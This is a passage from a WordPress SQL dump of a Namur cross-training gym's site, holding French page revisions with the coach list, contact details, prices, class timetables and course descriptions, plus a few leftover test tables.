alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Baptiste Pitsaer</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Anaïs Gosset</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-14', '', '', '2013-06-16 15:07:42', '2013-06-16 15:07:42', '', 20, 'http://www.crosstrainingcenter.be/?p=141', 0, 'revision', '', 0),
(142, 1, '2013-11-03 09:43:42', '2013-11-03 09:43:42', '<table style=\"border: 0px; width: 100%;\">\n<tbody>\n<tr>\n<td style=\"border: 0px; width: 50%;\">\n<h1>Prise de RDV :</h1>\nLes prises de RDV pour les séances de\nTeam Training, Duo Training, Personnal\nTraining ou Coaching nutritionnel se\nfont exclusivement par téléphone.\n\n0485 / 92 . 02 . 12\n<h1></h1>\n<h1>Adresse :</h1>\nBowling et Squash de Namur\nChaussée de Perwez 251\n<em id=\"__mceDel\"> 5002 Namur\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\n<td style=\"border: 0px; width: 50%;\">\n<h1>N :</h1>\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\n</tr>\n<tr>\n<td colspan=\"2\">\n<h1>Laissez-nous un message :</h1>\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\n</tr>\n</tbody>\n</table>', 'Contact - Namur', '', 'inherit', 'open', 'open', '', '9-autosave-v1', '', '', '2013-11-03 09:43:42', '2013-11-03 09:43:42', '', 9, 'http://www.crosstrainingcenter.be/?p=142', 0, 'revision', '', 0),
(144, 1, '2013-06-16 15:13:28', '2013-06-16 15:13:28', '<h1>Prise de RDV :</h1>\r\nPrise de RDV par téléphone : 0485 / 92 . 02 . 12\r\n\r\n<h1>Adresse :</h2>\r\nChaussée de Perwez 251\r\n5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a>\r\n\r\n<h1>Plan d\'accès :</h1>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-06-16 15:13:28', '2013-06-16 15:13:28', '', 9, 'http://www.crosstrainingcenter.be/?p=144', 0, 'revision', '', 0),
(143, 1, '2013-06-02 17:55:41', '2013-06-02 17:55:41', '<h1>Prise de RDV :</h1>\r\nPrise de RDV par téléphone : 04XX/XX.XX.XX\r\n\r\nLorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper.', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-06-02 17:55:41', '2013-06-02 17:55:41', '', 9, 'http://www.crosstrainingcenter.be/?p=143', 0, 'revision', '', 0),
(145, 1, '2013-06-16 14:47:43', '2013-06-16 14:47:43', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:47:43', '2013-06-16 14:47:43', '', 11, 'http://www.crosstrainingcenter.be/?p=145', 0, 'revision', '', 0),
(146, 1, '2013-06-23 13:16:35', '2013-06-23 13:16:35', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Prix :</h2>\r\n\r\n[table]\r\nYear,Make,Model,Length\r\n1997,Ford,E350,2.34\r\n2000,Mercury,Cougar,2.38\r\n[/table]\r\n\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-23 13:16:35', '2013-06-23 13:16:35', '', 11, 'http://www.crosstrainingcenter.be/?p=146', 0, 'revision', '', 0),
(147, 1, '2013-06-23 13:18:02', '2013-06-23 13:18:02', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Prix :</h2>\r\n\r\n[table caption=\"Just test table\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nno,head1,head2,head3,head4\r\n1,row1col1,row1col2,row1col3,100\r\n2,row2col1,row2col2,row2col3,20000\r\n3,row3col1,,row3col3,1405\r\n4,row4col1,row4col2,row4col3,23023\r\n[/table]	\r\n\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-23 13:18:02', '2013-06-23 13:18:02', '', 11, 'http://www.crosstrainingcenter.be/?p=147', 0, 'revision', '', 0),
(148, 1, '2013-07-03 13:56:11', '2013-07-03 13:56:11', '', 'Julie Pierrard', '', 'publish', 'closed', 'closed', '', '148', '', '', '2013-07-03 14:13:21', '2013-07-03 14:13:21', '', 0, 'http://www.crosstrainingcenter.be/?post_type=collaborateur&#038;p=148', 0, 'collaborateur', '', 0),
(150, 1, '2013-07-03 13:59:47', '2013-07-03 13:59:47', '', 'Mathieu Gille', '', 'publish', 'closed', 'closed', '', '150', '', '', '2013-07-03 14:13:07', '2013-07-03 14:13:07', '', 0, 'http://www.crosstrainingcenter.be/?post_type=collaborateur&#038;p=150', 0, 'collaborateur', '', 0),
(330, 1, '2013-07-10 16:10:46', '2013-07-10 16:10:46', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs 